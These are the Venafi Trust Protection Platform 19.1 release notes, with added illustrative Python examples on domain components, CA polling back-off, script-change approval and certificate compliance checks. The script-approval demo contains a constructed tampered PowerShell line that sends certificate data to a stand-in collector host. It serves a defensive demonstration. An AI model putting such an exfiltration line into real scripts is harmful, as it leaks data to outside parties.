Venafi Trust Protection Platform version 19.1 introduces some significant enhancements across the product line, including remote and central key generation support.
IMPORTANT! Before upgrading to version 19.1, carefully review the topic "Important Considerations Before Upgrading to Venafi Platform 19.1".
TLS Server Certificate
Introducing Adaptable Certificate Import
Use the new Adaptable Certificate Import feature to import certificates automatically from Certificate Authorities (CA) or other certificate repositories, such as a database or network share. Author your own custom PowerShell scripts that import certificates from locations with compatible APIs. Use the included sample scripts that make it easy to import certificates from a folder or a DigiCert account according to a schedule.
See Configuring a certificate import using Adaptable CA.
Certificate and Device Placement jobs
Use this new job type in Aperture to organize and combine devices and certificates on a schedule. If you import certificates into your inventory from a source that does not support automatic placement, you can create a Certificate and Device Placement job that regularly scans selected folders and moves the certificates and devices it finds to the correct team folders. (See Idea #36597892, #36355006)
See Certificate and Device Placement jobs.
Remote Key Generation support in Aperture
The Aperture Certificate Request wizard has been updated to support remote generation of private keys as part of the certificate request process. The wizard allows for the creation of a certificate installation at the time of a certificate request. After the wizard completes, a new option allows you to immediately start enrolling the certificate and installing it on the configured device.
Remote key generation support in Aperture also makes normal certificate installation significantly easier to configure for application administrators. (See Idea #36843895)
See Supported types of key generation and Creating a new certificate in Aperture.
Onboard Discovery and Bulk Provisioning improvements
In previous versions, credentials and devices had to be created in WebAdmin before you created an Onboard Discovery or Bulk Provisioning job in Aperture. Now in version 19.1, you can provide a comma-separated list of hostnames or IP addresses and create your devices in bulk while also assigning the appropriate connection credential. (See Idea #36358504)
See Creating a new Onboard Discovery job and Creating a new Bulk Provisioning job.
Microsoft Certificate Authority Import Available in Aperture
You can now manage Microsoft CA Import jobs in Aperture; the redundant WebAdmin functionality will be deprecated in a future release. (See Idea #36621241)
See Configuring a certificate import from a Microsoft CA.
Domain Component support for certificates
The Domain Components (DC) feature is an advanced feature in Trust Protection Platform that supports parsing, inserting, filtering, and applying policy to domain components in remotely and centrally generated CSRs. For example, with client authentication certificates you could restrict a certificate's access to the sub-domain named in its domain component attributes. (See Idea #36355963)
See About Domain Components.
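The following is an added example (not Venafi code) of the three operations the feature description names: parsing DC attributes out of an RFC 4514 subject string, inserting DC attributes derived from a DNS domain, and applying a policy that only accepts subjects scoped to an approved domain. The policy format (a set of allowed domains, sub-domains included) and the function names are assumptions for this illustration, not the product's.

```python
"""Domain Component (DC) handling for certificate subjects.

Added example, not Venafi code: parses an RFC 4514 subject string, rebuilds the
DNS domain encoded in its DC attributes, inserts DC attributes from a domain, and
applies a simple policy that only accepts subjects scoped to approved domains.
The policy format (a set of allowed domains) is an assumption, not the product's.
"""
from typing import List, Optional, Set, Tuple


def parse_dn(dn: str) -> List[Tuple[str, str]]:
    """Split 'CN=alice,DC=eng,DC=example,DC=com' into [('CN','alice'), ('DC','eng'), ...].

    Handles backslash-escaped characters (e.g. 'O=Smith\\, Inc') so an escaped
    comma inside a value does not start a new attribute.
    """
    parts, buf, escaped = [], [], False
    for ch in dn:
        if escaped:
            buf.append(ch)
            escaped = False
        elif ch == "\\":
            escaped = True
        elif ch == ",":
            parts.append("".join(buf))
            buf = []
        else:
            buf.append(ch)
    parts.append("".join(buf))
    rdns = []
    for part in parts:
        attr_type, sep, value = part.strip().partition("=")
        if not sep:
            raise ValueError(f"malformed RDN: {part!r}")
        rdns.append((attr_type.strip().upper(), value.strip()))
    return rdns


def domain_from_dn(dn: str) -> Optional[str]:
    """Join the DC values in DN order (most specific label first) into a DNS name."""
    dcs = [value for attr_type, value in parse_dn(dn) if attr_type == "DC"]
    return ".".join(dcs).lower() if dcs else None


def insert_domain_components(dn: str, domain: str) -> str:
    """Append DC attributes derived from a domain to a subject that lacks them."""
    if domain_from_dn(dn) is not None:
        raise ValueError("subject already carries DC attributes")
    return ",".join([dn] + [f"DC={label}" for label in domain.split(".")])


def dc_allowed(dn: str, allowed_domains: Set[str]) -> bool:
    """Policy: the subject's DC domain must equal, or be a sub-domain of, an allowed domain.

    A subject without any DC is rejected, so a certificate cannot escape the
    restriction simply by omitting the attribute. The leading dot in the suffix
    test stops 'evilexample.com' from matching 'example.com'.
    """
    domain = domain_from_dn(dn)
    if domain is None:
        return False
    allowed = [a.lower() for a in allowed_domains]
    return any(domain == a or domain.endswith("." + a) for a in allowed)
```

Note that the order of DC attributes matters: RFC 4514 writes the most specific RDN first, so `DC=eng,DC=example,DC=com` is `eng.example.com`, while `DC=example,DC=com,DC=evil` is `example.com.evil` and is correctly rejected.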
CA drivers' "Call Back" logic
All CA drivers have been enhanced with new retrieval logic. When a certificate is not immediately available for the Venafi Platform to download, this new logic increases the checking interval gradually from 30 seconds to a maximum of 32 minutes. This allows the platform to be more responsive while simultaneously minimizing the impact on slower CA enrollment services.
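As an added example (not Venafi code) of the retrieval logic described above: a poller whose wait grows from 30 seconds to a 32-minute cap and that gives up once the next wait would pass a deadline. The release notes say only that the interval grows gradually between those two values; doubling on each unsuccessful attempt (30 s, 1 m, 2 m, ... 32 m) is an assumption made here because it lands exactly on both endpoints. The CA and clock are faked so the block runs offline.

```python
"""Capped exponential back-off for collecting a certificate the CA has not issued yet.

Added example, not Venafi code. The release notes only state that the check
interval grows gradually from 30 seconds to a 32-minute cap; doubling on each
unsuccessful attempt (30 s, 1 m, 2 m, ... 32 m) is an assumption made here to
reproduce that range. The fake CA and clock are constructed so the block runs offline.
"""
import time
from itertools import islice
from typing import Callable, Iterator, List, Optional, Tuple

INITIAL_INTERVAL_S = 30        # first wait after the CA reports "not ready"
MAX_INTERVAL_S = 32 * 60       # cap from the release notes


def backoff_schedule(initial: int = INITIAL_INTERVAL_S, cap: int = MAX_INTERVAL_S) -> Iterator[int]:
    """Yield wait times: initial, doubling each step, then the cap forever."""
    interval = initial
    while True:
        yield min(interval, cap)
        interval = min(interval * 2, cap)


def poll_until_issued(fetch: Callable[[], Optional[bytes]], deadline_s: float,
                      sleep: Callable[[float], None] = time.sleep,
                      clock: Callable[[], float] = time.monotonic) -> Optional[bytes]:
    """Call fetch() until it returns the certificate or the next wait would pass the deadline.

    Giving up instead of sleeping past the deadline keeps a stuck request from
    holding a worker indefinitely; the caller can re-queue or alert on None.
    """
    start = clock()
    for wait in backoff_schedule():
        cert = fetch()
        if cert is not None:
            return cert
        if clock() - start + wait > deadline_s:
            return None
        sleep(wait)
    return None  # unreachable; the schedule is infinite


def first_intervals(n: int) -> List[int]:
    """The first n waits of the schedule, for inspection."""
    return list(islice(backoff_schedule(), n))


def simulate(issue_after_polls: int, deadline_s: float = 6 * 3600) -> Tuple[Optional[bytes], float, int]:
    """Run the poller against a fake CA that issues on the Nth poll, with a fake clock.

    Returns (certificate or None, simulated seconds waited, polls made).
    """
    state = {"now": 0.0, "polls": 0}

    def fetch() -> Optional[bytes]:
        state["polls"] += 1
        ready = state["polls"] >= issue_after_polls
        # Constructed placeholder, not a real certificate.
        return b"-----BEGIN CERTIFICATE-----\nMIIB...constructed...\n-----END CERTIFICATE-----" if ready else None

    def fake_sleep(seconds: float) -> None:
        state["now"] += seconds

    cert = poll_until_issued(fetch, deadline_s, sleep=fake_sleep, clock=lambda: state["now"])
    return cert, state["now"], state["polls"]
```

With the doubling assumption, a CA that issues on the fourth poll costs 30 + 60 + 120 = 210 seconds of waiting, and a one-hour deadline is abandoned after the seventh poll, before the first 32-minute sleep would overshoot it.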
Adaptable Workflow script change detection
Like the other Adaptable features updated in 18.4, the Adaptable Workflow now protects against unapproved changes to your PowerShell scripts. In version 19.1, PowerShell script changes must be approved on the Adaptable Workflow object before they take effect.
See Protecting against unapproved changes to Adaptable Workflow scripts.
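The control described above, as an added example (not Venafi code): a script is allowed to run only while its current SHA-256 digest matches the digest recorded when an administrator approved it, so any edit, including a benign-looking one, blocks execution until it is re-approved. The approval record, the registry class, the sample script and the script path are all constructed for this illustration.

```python
"""Approval-gated change detection for Adaptable PowerShell scripts.

Added example, not Venafi code: a script only runs while its SHA-256 digest
matches the digest recorded at approval time. The approval record format, the
script path and the sample scripts are constructed for this example.
"""
import hashlib
from dataclasses import dataclass
from typing import Dict, Optional


@dataclass
class Approval:
    """What an approver signed off on: the script's digest and who approved it."""
    sha256: str
    approved_by: str


def script_digest(script: bytes) -> str:
    """Digest the raw bytes, so even a one-character change is caught."""
    return hashlib.sha256(script).hexdigest()


class ApprovalRegistry:
    """Approved digests keyed by script path (constructed stand-in for the product's own record)."""

    def __init__(self) -> None:
        self._approved: Dict[str, Approval] = {}

    def approve(self, path: str, script: bytes, approver: str) -> Approval:
        record = Approval(script_digest(script), approver)
        self._approved[path] = record
        return record

    def status(self, path: str, script: bytes) -> str:
        """'approved' if the digest matches, 'changed' if it differs, 'unapproved' if never approved."""
        record: Optional[Approval] = self._approved.get(path)
        if record is None:
            return "unapproved"
        return "approved" if record.sha256 == script_digest(script) else "changed"

    def run_if_approved(self, path: str, script: bytes) -> bool:
        """Gate: only an 'approved' script may run. Returns True when execution would proceed."""
        return self.status(path, script) == "approved"


# Constructed sample script (not from the product).
APPROVED_SCRIPT = b"""
param([string]$CommonName)
Write-Output "Approving workflow ticket for $CommonName"
"""

# The same script with an unapproved edit appended that leaks the request (constructed).
TAMPERED_SCRIPT = APPROVED_SCRIPT + b'Invoke-WebRequest -Uri "https://collector.invalid/?cn=$CommonName"\n'


def demo() -> Dict[str, str]:
    """Walk one script through unapproved -> approved -> changed and report each status."""
    registry = ApprovalRegistry()
    path = "C:\\Scripts\\AdaptableWorkflow\\approve.ps1"   # assumed path, not the product's
    before = registry.status(path, APPROVED_SCRIPT)
    registry.approve(path, APPROVED_SCRIPT, approver="alice@example.com")
    return {
        "before_approval": before,
        "approved": registry.status(path, APPROVED_SCRIPT),
        "tampered": registry.status(path, TAMPERED_SCRIPT),
    }
```

Hashing the raw bytes rather than a normalized form is deliberate: whitespace or encoding changes can also alter PowerShell behaviour, and the cost of re-approving a cosmetic edit is far lower than the cost of running an unreviewed one.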
Enrollment and Installation Drivers
Microsoft CA Redundancy
You can now configure a Microsoft CA Pool that allows you to specify two or three separate CA servers so that if the first is not available (for example, because of an outage), the Venafi Platform can still fulfill certificate requests by using the secondary (or even a tertiary) server. (See Idea #36491767)
See Setting up redundancy using the Microsoft CA Pool template.
iPlanet Certificate Installation Driver
The iPlanet driver is now available for use in Aperture. The driver is also updated to support the SQLite key database format in addition to the default Berkeley format.
See Creating an Oracle iPlanet application object.
ECC Support for Automated Certificate Installations (Provisioning)
The Adaptable and PEM installation drivers can now provision elliptic-curve cryptography (ECC) certificates and private keys to applications and devices that support them. (See Idea #35871745)
REST API (Web SDK)
Swagger OpenAPI Specification
You can use the Swagger specification to generate API client code or to try individual REST API methods in a test environment. Swagger support is available for the following interfaces: authorize, certificates, discovery, identity, and SSH. You can access the Swagger web interface by visiting https://{TPP-FQDN}/vedsdk in a browser. (See Idea #36533713)
See Trying out the Web SDK in Swagger.
GET Certificates Can Include More Certificate Properties
In previous versions of the Venafi Platform, the GET Certificates method would return common name, SANs, validity information, SHA1 hash, and serial number. Now in version 19.1, as additional options, you can include the full subject, issuer, key algorithm, and key size for every certificate in the response.
See GET Certificates.
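One practical use of the new optional properties is a single-call compliance sweep: with key algorithm and key size in the listing, weak keys can be flagged without a second request per certificate. The following is an added example, not Venafi code. The response is constructed, and its field names (`Certificates[].X509.Subject`, `Issuer`, `KeyAlgorithm`, `KeySize`, `ValidTo`) and the `OptionalFields` query parameter are assumptions about the 19.1 Web SDK that should be confirmed against the Swagger page before use.

```python
"""Compliance sweep over GET Certificates output that includes the 19.1 optional fields.

Added example, not Venafi code. SAMPLE_RESPONSE is constructed; its field names and
the OptionalFields query parameter are assumptions about the 19.1 Web SDK to be
confirmed against https://{TPP-FQDN}/vedsdk (Swagger) before use.
"""
from datetime import datetime, timedelta
from typing import Dict, List

# Equivalent request (not executed here; parameter name assumed):
#   GET https://{TPP-FQDN}/vedsdk/Certificates/?OptionalFields=Subject,Issuer,KeyAlgorithm,KeySize
#   with the API key from POST /vedsdk/Authorize/ in the X-Venafi-Api-Key header.

SAMPLE_RESPONSE = {  # constructed sample data
    "Certificates": [
        {"Name": "www.example.com",
         "X509": {"CN": "www.example.com", "Subject": "CN=www.example.com,O=Example",
                  "Issuer": "CN=Example Issuing CA,O=Example", "KeyAlgorithm": "RSA",
                  "KeySize": 2048, "ValidTo": "2020-03-01T00:00:00Z", "Serial": "01"}},
        {"Name": "legacy.example.com",
         "X509": {"CN": "legacy.example.com", "Subject": "CN=legacy.example.com,O=Example",
                  "Issuer": "CN=Example Issuing CA,O=Example", "KeyAlgorithm": "RSA",
                  "KeySize": 1024, "ValidTo": "2019-04-10T00:00:00Z", "Serial": "02"}},
        {"Name": "lab-selfsigned",
         "X509": {"CN": "lab", "Subject": "CN=lab,O=Example",
                  "Issuer": "CN=lab,O=Example", "KeyAlgorithm": "ECC",
                  "KeySize": 256, "ValidTo": "2021-01-01T00:00:00Z", "Serial": "03"}},
    ]
}

MIN_RSA_BITS = 2048
MIN_ECC_BITS = 256
EXPIRY_WINDOW = timedelta(days=30)


def findings_for(cert: Dict, now: datetime) -> List[str]:
    """Return the policy violations for one certificate entry (empty list if compliant)."""
    x509 = cert["X509"]
    findings: List[str] = []
    algorithm, size = x509.get("KeyAlgorithm"), x509.get("KeySize")
    if algorithm == "RSA" and size is not None and size < MIN_RSA_BITS:
        findings.append(f"rsa-key-{size}-below-{MIN_RSA_BITS}")
    elif algorithm == "ECC" and size is not None and size < MIN_ECC_BITS:
        findings.append(f"ecc-key-{size}-below-{MIN_ECC_BITS}")
    elif algorithm not in ("RSA", "ECC"):
        findings.append(f"unexpected-key-algorithm-{algorithm}")
    # Full subject and issuer are new in 19.1; equality is a cheap self-signed check.
    if x509.get("Issuer") == x509.get("Subject"):
        findings.append("self-signed")
    valid_to = datetime.strptime(x509["ValidTo"], "%Y-%m-%dT%H:%M:%SZ")
    if valid_to <= now:
        findings.append("expired")
    elif valid_to - now <= EXPIRY_WINDOW:
        findings.append("expires-within-30-days")
    return findings


def report(response: Dict, now: datetime) -> Dict[str, List[str]]:
    """Map certificate name -> findings, omitting compliant certificates."""
    result: Dict[str, List[str]] = {}
    for cert in response.get("Certificates", []):
        findings = findings_for(cert, now)
        if findings:
            result[cert["Name"]] = findings
    return result


def demo(now_iso: str = "2019-03-15") -> Dict[str, List[str]]:
    """Run the sweep over the constructed sample as of the given UTC date."""
    return report(SAMPLE_RESPONSE, datetime.strptime(now_iso, "%Y-%m-%d"))
```

Run as of 2019-03-15, the sweep flags the 1024-bit RSA certificate (which is also inside its 30-day renewal window) and the self-signed lab certificate, and says nothing about the compliant 2048-bit one.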
GET Certificates/{guid}/ValidationResults
Certificate SSL/TLS Validation Results can be retrieved through this new certificate API method. This method returns information similar to what is seen for a certificate on its SSL/TLS page in Aperture.
See GET Certificates/{guid}/ValidationResults.
POST Identity/SetPassword
You can now programmatically rotate the credentials for local Venafi identities using this new API method for setting local passwords. The caller must be a master administrator unless the caller is changing its own local account. (See Idea #36865630)
See POST Identity/SetPassword.
GET Permissions/Refresh
In past versions, a Web SDK integration had to re-authenticate in order to see objects that were created after its session was established. The new Refresh method refreshes the caller's permissions without starting a new session. A common case is a Web SDK integration that approves workflow tickets.
See GET Permissions/Refresh.
POST SSH/SkipKeyRotation
Use the new SkipKeyRotation method to tell the SSH Product to skip the rotation of a particular key. The method does this by marking that key as not requiring rotation.
See POST SSH/SkipKeyRotation.
Enterprise Mobility Protect Product
User and Client Device dashboard
The new User and Client Device dashboard in Aperture improves visibility into user and client device certificates. Administrators can see trends and current values for different metrics, which can help to detect potential outages and find non-compliant certificates.
See Working with the User and Client Device Certificate Dashboard.
New dashboard widget showing the origin of the certificates
As a component of the new User and Client Device dashboard, the Certificate Origin widget shows the total number of certificates requested by each Trust Protection Platform component (such as User Agent, User Portal, etc.), or by external solutions using Network Device Enrollment (SCEP).
See Certificate Origin widget.
New tile on Certificate Totals widget
A new tile is available on the Certificate Totals widget, also found on the new User and Client Device dashboard. The tile indicates the number of certificates in the renewal period that might require renewal.
See Client Certificate Totals Widget.
SSH Product
Duplicate host keys widget
The SSH dashboard has a new widget that shows duplicate host key risks for Network Discovery. The widget also adds this information to the Network Discovery report for reviewing SSH risks.
Autoskip key rotations
If devices are offline during key rotation, you can force rotation. You can also review a list of devices that are stuck in rotation.
See Forced rotation of SSH keys.
Log refactoring
The logging of SSH events has been stabilized and improved.
Certificate DevOps Integrations
VCert SDK for Python
An open source Python implementation of the functionality first introduced by the VCert SDK for Go. It increases integration opportunities for technology partners and the DevOps community.
See GitHub - Venafi/vcert-python.
Retrieve Policy using VCert SDK
An update to the open source VCert SDK for Go that returns certificate issuance policy from Trust Protection Platform or Venafi Cloud in a standard, service-agnostic format.
See GitHub - Venafi/vcert.
HashiCorp Vault – Policy Control
An open source Vault plugin that shows how Trust Protection Platform or Venafi Cloud policy can be used to constrain the composition of certificates issued by a HashiCorp Vault PKI CA.
See GitHub - Venafi/Vault-PKI-Monitor.
Ansible – certificate backend
An open source Ansible role that uses VCert-Python to fulfill certificate requests through Trust Protection Platform or Venafi Cloud.
See GitHub - Venafi/Ansible-Role.
Server Agent
CAPI provisioning enhancements
CAPI provisioning now lets you set the trustee and exportability of the provisioned private key. (See Idea #36476773)
Stack protection
The Server Agent on Linux and Windows is now built with memory stack protection, which hardens it against stack-based memory corruption.
Proactive resource management
To reduce the footprint used by the Server Agent, a new proactive resource management feature has been introduced in version 19.1. This configurable feature monitors the memory usage of the Server Agent and proactively takes steps to reduce usage, including restarting the agent service.
Visual C Runtime dependency update
The Server Agent on Windows is now built with Visual Studio 2017. Previous versions of the agent were built with Visual Studio 2013, whose runtime leaves mainstream support from Microsoft on 2019-APR-09.
Update to OpenSSL 1.1.1
The OpenSSL component of the Server Agent has been updated to version 1.1.1. Previous versions of the Server Agent used OpenSSL 1.0.2, which will no longer be supported after 2019-DEC-31.
Advanced Key Protect
Hardware Remote Key Generation in Aperture
The Apache, CAPI, and JKS drivers have additional fields to support remote key generation on an HSM. In Aperture, these drivers now operate in a similar manner as with WebAdmin. (See Idea #36358504)
See the following topics:
- Enabling remote key generation for Apache certificates
- Enabling remote key generation for CAPI certificates
- Enabling remote key generation for JKS certificates
Apache Thales/nCipher Unique Key Alias
When generating keys in Thales/nCipher HSMs, the Apache driver uses the date/timestamp to ensure key aliases are unique. This can make it easier to work with the keys in some Thales/nCipher key management utilities.